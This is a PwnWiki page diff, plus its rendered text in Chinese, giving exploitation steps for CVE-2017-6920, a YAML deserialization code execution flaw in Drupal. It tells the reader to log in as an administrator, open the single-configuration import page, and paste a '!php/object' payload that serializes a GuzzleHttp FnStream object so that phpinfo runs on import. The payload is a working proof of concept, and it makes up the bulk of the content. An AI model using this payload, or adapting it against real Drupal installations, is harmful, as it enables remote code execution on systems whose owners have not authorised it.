Difference between revisions of "CVE-2017-6920 Drupal YAML 反序列化代碼執行漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==漏洞利用== </translate> <translate> 登錄管理員賬戶,訪問以下URL: </translate> <pre> http://127.0.0.1/admin/config/development...") |
(Marked this version for translation) |
||
| Line 2: | Line 2: | ||
<translate> | <translate> | ||
| − | ==漏洞利用== | + | ==漏洞利用== <!--T:1--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:2--> | ||
登錄管理員賬戶,訪問以下URL: | 登錄管理員賬戶,訪問以下URL: | ||
</translate> | </translate> | ||
| Line 13: | Line 14: | ||
<translate> | <translate> | ||
| + | <!--T:3--> | ||
<code>Configuration type</code>選擇為</code>Simple configuration</code> | <code>Configuration type</code>選擇為</code>Simple configuration</code> | ||
| + | <!--T:4--> | ||
<code>Configuration name</code>可以隨便填寫,在<code>Paste your configuration here</code>中寫入poc: | <code>Configuration name</code>可以隨便填寫,在<code>Paste your configuration here</code>中寫入poc: | ||
</translate> | </translate> | ||
| Line 22: | Line 25: | ||
<translate> | <translate> | ||
| + | <!--T:5--> | ||
點擊左下角的Import按鈕便可以觸發漏洞。 | 點擊左下角的Import按鈕便可以觸發漏洞。 | ||
</translate> | </translate> | ||
Latest revision as of 19:35, 7 April 2021
漏洞利用
登錄管理員賬戶,訪問以下URL:
http://127.0.0.1/admin/config/development/configuration/single/import
Configuration type選擇為Simple configuration
Configuration name可以隨便填寫,在Paste your configuration here中寫入poc:
!php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"
點擊左下角的Import按鈕便可以觸發漏洞。
